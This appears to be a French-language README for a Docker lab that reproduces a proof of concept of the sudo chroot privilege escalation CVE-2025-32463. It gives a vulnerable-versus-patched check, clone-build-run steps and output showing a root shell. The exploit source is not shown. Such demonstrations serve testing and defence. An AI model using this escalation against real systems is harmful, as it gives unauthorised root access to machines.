
C réimplémentation du PoC chwoot
Ce dépôt fournit un environnement minimal et reproductible pour démontrer la faille d'élévation de privilèges CVE‑2025‑32463 dans la fonctionnalité chroot de sudo.
Les versions vulnérables de sudo 1.9.14 à 1.9.17 (toutes les révisions p) sur la plupart des distributions Linux sont concernées.
Pages de sécurité
| Fichier | Objectif |
|---|---|
| Dockerfile | Construit une image Ubuntu 24.04 avec sudo 1.9.16p2 vulnérable et les outils de compilation |
| sudo‑chwoot.sh | Exploit de preuve de concept qui ouvre un shell root dans le chroot |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh transmet --privileged et --rm à Docker afin que le conteneur se nettoie tout seul à la sortie.
Supprimez l'image lorsque vous avez terminé :
docker rmi vpr-chwoot
| run.sh |
| Script d'assistance qui construit l'image (si nécessaire) et lance le conteneur d'exploitation |